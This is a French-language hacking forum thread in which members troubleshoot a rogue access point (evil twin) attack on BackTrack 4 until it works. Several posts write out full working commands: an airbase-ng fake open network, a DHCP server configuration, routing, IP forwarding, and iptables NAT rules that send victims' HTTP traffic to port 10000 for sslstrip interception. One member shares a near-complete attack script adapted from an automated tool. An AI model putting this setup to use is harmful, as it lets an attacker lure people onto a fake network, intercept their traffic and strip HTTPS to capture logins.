Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 22-06-2010 23:20:01

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Rogue AP : OK sauf internet !

Bonsoir à tous et à toutes,

Un grand merci pour commencer, à tous ceux qui font vivre ce forum ! J'y apprends chaque jour des tonnes et des tonnes de choses que je m'efforce de réussir et d'intégrer !

Depuis peu, j'essaye de comprendre les tenants et aboutissants de l'attaque par Rogue AP.

Laissez-moi vous donner toutes les informations dont je dispose, pour que vous n'ayez pas à me poser 100 000 questions, je vous ferais ainsi perdre le moins de temps possible sur mon problème !

Le matériel :

- Un PC Portable que nous appellerons PC_VICTIME, booté sous Vista et muni d'une carte wifi intégrée
- Un PC Bureau que nous appellerons PC_ATTAQUANT, booté sous BT4
     * En wlan0: un dongle DWA-110 connecté sur ma Freebox [192.168.2.1]
     * En wlan1: une Alpha 036H en mode monitor (sur mon0)

[Petite précision qui a son importance : je n'utilise pas l'ethernet, c'est voulu. Je veux réaliser l'attaque à partir d'une connexion internet reçue par wifi]

La procédure suivie :


1°) dhcpd.conf : enregistré dans le /root/

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 192.168.2.1;
range 192.168.2.130 192.168.2.140;
}

2°) Je lance la Rogue AP sur l'interface monitor de mon Alpha.

airbase-ng -e Mon_Test mon0

3°) J'organise l'at0 (même configuration que dans dhcpd.conf)

ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

4°) Je configure et lance le serveur dhcp pour que ma victime ait une adresse ip & co

mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
dhcpd3 -d -f -cf /root/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

5°) Je configure les tables de routage (pour utiliser éventuellement Sslstrip d'ailleurs)

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.2.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

La logique veut donc qu'à cette étape, ma victime soit en mesure de détecter, de se connecter et de surfer sur l'AP ainsi créée.

Ma victime trouve bien le réseau, arrive à s'y connecter, dispose d'une adresse ip ... mais ne peut point surfer sur internet !

Ma victime : un ipconfig Connexion_Victime.jpg
Le problème : Victime_webbrowser.jpg


J'ai cherché par mal de choses, je n'ai malheureusement rien trouvé !
Si quelqu'un avait une idée, une solution, une piste ... je lui en serais éternellement reconnaissant !

En espérant avoir donné assez de détails,

Carto_


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 22-06-2010 23:47:55

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Rogue AP : OK sauf internet !

Salut je vois que tu galère je vais te dire ce que tu veut faire atxwpa (bt3f) le fait en trente seconde alors je ne suis pas passer aux 4 pour faire ceci utilise bt3 je pourrais t'aider sinon dit nous comment tu as fait sous bt4

Hors Ligne

#3 22-06-2010 23:58:48

Floux
Membre Radioactif
Inscription : 23-04-2010
Messages : 92

Re : Rogue AP : OK sauf internet !

Salut

lol J ai eu le meme "souci" on va dire wink quand j ai voulu adapter atxwpa sur BT4

Remplace

iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.2.1


par

iptables -t nat -A PREROUTING -p udp -j DNAT --to 212.27.40.240    ( DNS FREE)

Dernière modification par Floux (22-06-2010 23:59:54)

Hors Ligne

#4 23-06-2010 00:21:36

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Arf, merci pour vos réponses !

Je veux comprendre ce que je fais et y arriver, après je verrais du coté des tools automatisant le tout !

J'ai beau changer la ligne Floux, toujours la même chose ... Je broie du noir !


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#5 23-06-2010 00:23:14

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Pourtant au niveau de la connexion à l'AP tout fonctionne :

03:19:31  Client 00:1B:77:DD:51:12 associated (unencrypted) to ESSID: "Mon_Test"

La sortie du coté dhcpd:

[email protected]:~# dhcpd3 -d -f -cf /root/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0
Internet Systems Consortium DHCP Server V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/at0/00:c0:ca:39:78:6a/192.168.2.128/25
Sending on   LPF/at0/00:c0:ca:39:78:6a/192.168.2.128/25
Sending on   Socket/fallback/fallback-net
DHCPDISCOVER from f4:0b:93:44:3a:61 via at0
DHCPOFFER on 192.168.2.130 to f4:0b:93:44:3a:61 (BLACKBERRY-A452) via at0
DHCPREQUEST for 192.168.2.130 (192.168.2.129) from f4:0b:93:44:3a:61 (BLACKBERRY-A452) via at0
DHCPACK on 192.168.2.130 to f4:0b:93:44:3a:61 (BLACKBERRY-A452) via at0
DHCPREQUEST for 192.168.2.11 from 00:1b:77:dd:51:12 via at0: wrong network.
DHCPNAK on 192.168.2.11 to 00:1b:77:dd:51:12 via at0
DHCPREQUEST for 192.168.2.11 from 00:1b:77:dd:51:12 via at0: wrong network.
DHCPNAK on 192.168.2.11 to 00:1b:77:dd:51:12 via at0
DHCPREQUEST for 192.168.2.11 from 00:1b:77:dd:51:12 via at0: wrong network.
DHCPNAK on 192.168.2.11 to 00:1b:77:dd:51:12 via at0
DHCPREQUEST for 192.168.2.11 from 00:1b:77:dd:51:12 via at0: wrong network.
DHCPNAK on 192.168.2.11 to 00:1b:77:dd:51:12 via at0
DHCPREQUEST for 192.168.2.11 from 00:1b:77:dd:51:12 via at0: wrong network.
DHCPNAK on 192.168.2.11 to 00:1b:77:dd:51:12 via at0
DHCPREQUEST for 192.168.2.11 from 00:1b:77:dd:51:12 via at0: wrong network.
DHCPNAK on 192.168.2.11 to 00:1b:77:dd:51:12 via at0
DHCPREQUEST for 192.168.2.11 from 00:1b:77:dd:51:12 via at0: wrong network.
DHCPNAK on 192.168.2.11 to 00:1b:77:dd:51:12 via at0
DHCPREQUEST for 192.168.2.11 from 00:1b:77:dd:51:12 via at0: wrong network.
DHCPNAK on 192.168.2.11 to 00:1b:77:dd:51:12 via at0
DHCPDISCOVER from 00:1b:77:dd:51:12 via at0
DHCPOFFER on 192.168.2.131 to 00:1b:77:dd:51:12 (BT1) via at0
DHCPREQUEST for 192.168.2.131 (192.168.2.129) from 00:1b:77:dd:51:12 (BT1) via at0
DHCPACK on 192.168.2.131 to 00:1b:77:dd:51:12 (BT1) via at0
DHCPINFORM from 192.168.2.131 via at0
DHCPACK to 192.168.2.131 (00:1b:77:dd:51:12) via at0
DHCPINFORM from 192.168.2.131 via at0
DHCPACK to 192.168.2.131 (00:1b:77:dd:51:12) via at0

--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#6 23-06-2010 00:24:19

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

(Comme vous pouvez le voir, j'essaye tout d'abord de mon blackberry puis de mon PC_VIctime (BT1) mais moi sur mon écran, mon navigateur ne veut pas surfer :-p !

...


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#7 23-06-2010 09:08:34

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Si vous avez des pistes n'hésitez pas, même si c'est pas une solution complète, je veux réussir à lancer cette fichue rogue AP et que mon autre PC puisse surfer !


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#8 23-06-2010 09:14:49

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP : OK sauf internet !

Salut Carto_

Ca a l'air OK du côté du DHCP, il reste 2 sources de problèmes potentiels : le routage et le DNS. Donc on va tester dans l'ordre :
- ping de l'AP : [c]ping 192.168.2.1[/c] (je suppose, sinon adapte l'IP)
- ping réseau extérieur : [c]ping 8.8.8.8[/c] (un serveur sur le net, le DNS de Google en l'occurence)
- ping [c]www.google.fr[/c]

Si la première commande échoue, c'est mauvais signe, ca veut dire qu'il y a un problème du côté du réseau interne (donc configuration de l'AP)
Si la deuxième commande échoue, ca veut dire que tu ne peux pas sortir du réseau local, il y a un problème de routage (peut-être iptables qui foire encore)
Si seule la troisième commande échoue, c'est juste un problème de DNS, et ca se règle facilement :

echo 'nameserver 8.8.8.8' > /etc/resolv.conf

Un serveur DNS sert à "traduire" les noms de domaine en adresses IP. Si ton système ne connaît pas de serveur DNS à interroger, tu ne peux surfer qu'en tapant les IP dans ton navigateur (exemple : 209.85.227.103 pour google.fr)
Normalement, c'est le serveur DHCP qui donne aux clients l'adresse d'un serveur DNS à utiliser. Si ce n'est pas le cas, c'est qu'il manque une ligne dans ton dhcp.conf pour le spécifier. Ca ressemble à ca :

option domain-name-servers 8.8.8.8, 208.67.222.222;

Ca règle le problème ? smile

Hors Ligne

#9 23-06-2010 09:24:28

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

J'essaye le premier ping, 192.168.2.1 [Ma freebox] quand je suis connecté à la rogue après avoir fait toutes les étapes que je donne ci-dessus, dans le même ordre, et malheureusement ça ne donne rien !
rep_antares.jpg


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#10 23-06-2010 09:27:12

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Par contre quand je me ping : ping 192.168.2.130 ça fonctionne ...


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#11 23-06-2010 09:34:01

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP : OK sauf internet !

Dans un premier temps, le but n'est pas de ping'er la freebox mais ton Rogue AP lui-même. C'est lui qui donne une adresse IP à la victime, et qui lui sert de passerelle, donc c'est le premier "maillon" de la chaîne.
Si la victime ne peut même pas ping'er le Rogue AP, ca ne sert à rien d'aller plus loin le problème est dans la configuration du réseau local. Donc regarde sur BackTrack (ta machine attaquante) à quelle adresse est associée  l'interface du Rogue AP (sans doute at0, d'après ce que je vois plus haut --> [c]ifconfig at0[/c]) et essaie de ping'er cette adresse à partir de la victime.

On va vérifier ton routage aussi, parce que ton [c]route add [...] gw 192.168.2.129[/c] me parait étrange... Tu spécifies que la passerelle (de sortie de ton rogue) est 192.168.2.129, mais ca correspond à quoi cette IP ? Ta Freebox ?
Bon, bref, tu peux nous copier-coller le résultat de la commande "route" sur ta machine attaquante (Rogue AP) et de la commande "route PRINT" sur ta machine victime ? smile

Hors Ligne

#13 23-06-2010 09:53:38

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

WLAN1 : Dongle connecté à la Freebox
WLAN0 et mon0 : Alpha


LA COMMANDE ROUTE SUR LE PC ATTAQUANT :

[email protected]:~# route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.2.128   192.168.2.129   255.255.255.128 UG    0      0        0 at0
192.168.2.128   *               255.255.255.128 U     0      0        0 at0
192.168.2.0     *               255.255.255.0   U     0      0        0 wlan1
default         192.168.2.1     0.0.0.0         UG    0      0        0 wlan1

ROUTE PRINT SUR LA MACHINE VICTIME :

rep_2.jpg


Un énorme merci à vous tous qui m'aidez à résoudre mon problème, j'espère qu'on va trouver le point de bugg !
Merci !

Dernière modification par Carto_ (23-06-2010 09:54:32)


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#14 23-06-2010 10:06:15

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP : OK sauf internet !

[email protected], ne pars pas trop loin, je sens qu'on sera pas trop de 2 pour régler le problème big_smile

Bon, là à froid comme ca j'ai un peu de mal (c'est plus de mon âge, le routage manuel...) mais je crois que le problème vient bien du 192.168.2.129. Donc je répète ma question : à quelle machine correspond cette adresse ?
Regarde la table de routage de ta machine attaquante. La colonne "Flags" te montre où sont les passerelles (avec un G comme Gateway). Tu vois que sur l'interface at0, la passerelle est la mystérieuse machine 2.129 : dès qu'une station sur le sous-réseau d'at0 (c-à-d une victime) voudra accéder au réseau, toutes les demandes seront envoyées à la mystérieuse machine en question, qui est censée les relayer à qui-de-droit. Si la machine n'existe pas ou qu'elle n'a pas de fonction de routage, tout le trafic de ton Rogue AP est envoyé vers un trou noir wink Tu noteras que la machine .2.129 est aussi la passerelle de la machine victime, ce qui confirme ce que je disais...

On va essayer de spécifier 192.168.2.1 (ta passerelle par défaut sur BT, la Freebox donc) comme gateway.
Modifie cette ligne du dhcp.conf :

option routers 192.168.2.1;

Répercute le changement dans la configuration de at0 :

route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.1

Et essaie de lancer un ping vers 192.168.2.1 depuis ta machine victime (vérifie d'abord dans sa table de routage que la passerelle est bien 192.168.2.1). Si ca ne marche pas, depuis la victime lance la commande suivante : [c]tracert 192.168.2.1[/c] (je doute qu'elle nous apprenne grand chose, mais on ne sait jamais) smile

[EDIT] Je viens de relire en détail ton setup, 192.168.2.129 c'est l'adresse fixe attribuée à ta carte at0, je comprends mieux la logique. Je vais continuer à chercher pour voir pourquoi ca ne marche pas, mais essaie quand même de changer ta passrelle en 192.168.2.1 wink

Hors Ligne

#15 23-06-2010 11:10:30

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

J'ai essayé mais ça ne fonctionne pas, je suis sincèrement désolé de vous faire perdre autant de temps ... Je continue mes investigations de mon coté et j'attends vos idées si on a déjà pas tout essayé !


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#16 23-06-2010 11:14:09

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

http://www.backtrack-linux.org/forums/b … ffing.html

Je suis ce tuto à lla lettre et je ne comprends pas pourquoi ça ne fonctionne pas.

Ma freebox est bien en 192.168.2.1 [mon PC Attaquant, connecté sur cette freebox a l'ip : 192.168.2.13]


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#17 23-06-2010 11:51:31

Floux
Membre Radioactif
Inscription : 23-04-2010
Messages : 92

Re : Rogue AP : OK sauf internet !

Salut

Je viens de "retester" tout marche nickel pour moi  je te fait un petit copier coller des parties du script a toi de l adapter wink

Ma config
Freebox 192.168.1.1
internet----> eth0
fake Ap mon0


dhcpd.conf


 ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 192.168.1.1;
range 192.168.1.130 192.168.1.140;
}

Airbase

airbase-ng -P -C 30 -c 6 -e "test" -v mon0
modprobe tun ;
ifconfig at0 up ;
ifconfig at0 192.168.1.129 netmask 255.255.255.128 ;
ifconfig at0 mtu 1400 ;
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129 ;

serveur dhcpd

mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
xterm -hold -e dhcpd3 -d -f -cf /root/sslwpa/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &

iptables


iptables --flush ;
iptables --table nat --flush ;
iptables --delete-chain ;
iptables --table nat --delete-chain ;
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE ;
iptables --append FORWARD --in-interface at0 -j ACCEPT ;
iptables -t nat -A PREROUTING -p udp -j DNAT --to 212.27.40.240 ;
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 ;

Dernière modification par Floux (23-06-2010 12:06:59)

Hors Ligne

#18 23-06-2010 15:53:11

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Mille Milliards de Mille Sabord !

Je suis ton script à la lettre en changeant tous les 192.168.1 par 192.168.2 et le gateway par 192.168.2.1 ainsi que eth0 par wlan1 (mon dongle wifi) et ça ne fonctionne toujours pas !

J'ai une ip sur le Pc_Victime, mais impossible de ping quoique ce soit ... Je commence à désespérer là ... Je réessaye ce soir, encore et encore ... Je vous tiens au courant et n'hésitez pas si vous avez des idées !


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#19 23-06-2010 16:14:20

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP : OK sauf internet !

Carto_, il faut qu'on fonctionne par étape, et il faut surtout que tu commences à être plus précis que "ca ne fonctionne pas" sinon on va jamais y arriver smile Il faut détailler les différentes "étapes" et nous dire où ca coince. Donc, dans l'ordre :
- recevoir une IP sur le client, à partir du DHCP --> ca a l'air OK
- auto-ping du client, sur sa propre adresse IP --> ca a l'air OK aussi
- ping du rogue AP depuis le client : [c]ping 192.168.2.129[/c] --> c'est la première étape critique
- ping de la freebox : [c]ping 192.168.2.1[/c]
- ping d'un serveur extérieur : [c]ping 8.8.8.8[/c]
- ping d'un nom de domaine : [c]ping google.fr[/c]

Une fois qu'on aura les 3 premières étapes, ca sera déjà une victoire en soi. Donc merci de recommencer les étapes que Floux t'a données, en adaptant comme tu l'as indiqué, et de donner le résultat de chaque étape smile

Si le problème se trouve au niveau du ping de la freebox, c'est peut-être l'IP forwarding qui est désactivé mais je doute parce que je pense qu'il est activé par défaut sous BT4. En tout cas c'est facile à vérifier :

cat /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward

La première commande sert à vérifier l'état actuel (s'il t'affiche 0 c'est qu'il était désactivé), et la seconde sert à l'activer. Pour ta culture, l'ip_forward est le mécanisme qui permet (ou pas) de faire passer des paquets d'une interface à l'autre. S'il est désactivé, ta machine ne peut pas servir de relais smile

Hors Ligne

#20 23-06-2010 16:14:40

Floux
Membre Radioactif
Inscription : 23-04-2010
Messages : 92

Re : Rogue AP : OK sauf internet !

Je te site   "En wlan0: un dongle DWA-110 connecté sur ma Freebox [192.168.2.1]" 
                " ainsi que eth0 par wlan1 (mon dongle wifi) et ça ne fonctionne toujours pas !"

remplace plutot eth0 par wlan0  wink

Sinon Question bete


es tu sur que ta box a l adresse 192.168.2.1 ?
As tu tester d aller sur le net depuis backtrack 4 ( services start networking enfin dans ce style lol puis lancer le navigateur ) ?

Hors Ligne

#21 23-06-2010 17:05:55

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Rogue AP : OK sauf internet !

tu le met ou déjà dhcpd.conf je ne m'en souviens plus sinon merci floux

Hors Ligne

#22 23-06-2010 17:10:29

Floux
Membre Radioactif
Inscription : 23-04-2010
Messages : 92

Re : Rogue AP : OK sauf internet !

en "principe" dans root sinon ta just a modifier la ligne:

dhcpd3 -d -f -cf /root/sslwpa/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

est modifier le chemin

d ailleur elle est a modifier si tu le met dans root wink

Dernière modification par Floux (23-06-2010 17:11:35)

Hors Ligne

#23 23-06-2010 23:15:47

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Ma freebox est bien en 192.168.2.1
dhcpd.conf est bien dans /root/ et j'avais modifié le chemin dans la commande de Floud
Bien sur eth0 était remplacé par wlan0 (ou wlan1 suivant l'ordre dans lequel je branchais les cartes après démarrage).

Bref, je suis chez quelqu'un d'autre pour la semaine donc j'essaye demain avec une Livebox en 192.168.1.1 et je vous tiens au courant derechef !


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#24 24-06-2010 09:54:29

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Heeeeeeeeeeeeeehaaaaaaaaaaaaaaaa !

Les amis, ça fonctionne !

Un dernier petit détail : je ne peux surfer que sur du HTTPS mais pas sur du HTTP
(Tous les pings sont O.K)

Effusion de joie dans mon bureau, vous n'imaginez même pas smile


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#25 24-06-2010 09:56:27

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

J'ai changé le DNS par le DNS Principal de la Livebox sur laquelle je me connecte
J'ai refais toutes les étapes unes à une en visant bien à penser à l'ip_forward, que j'avais du oublier en redémarrant lors de mon dernier test.

Bref, vraiment un grand merci à vous ... Je ne sais trop comment vous remercier de tous ce temps passé sur mon problème (un gros bisoux ?).

Pour le souci de HTTPS uniquement, je pense que c'est au niveau de la dernière ligne de l'iptables je vais chercher des infos de ce coté-ci.


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
106 2217 28-11-2016 19:42:10 par koala
35 1877 23-11-2016 16:31:33 par roofnat
16 1054 17-11-2016 12:22:00 par disquette
10 445 11-11-2016 22:11:03 par koala
[ Projet Rogue AP ] par shirocen
16 456 19-10-2016 05:14:45 par shirocen

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.033 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]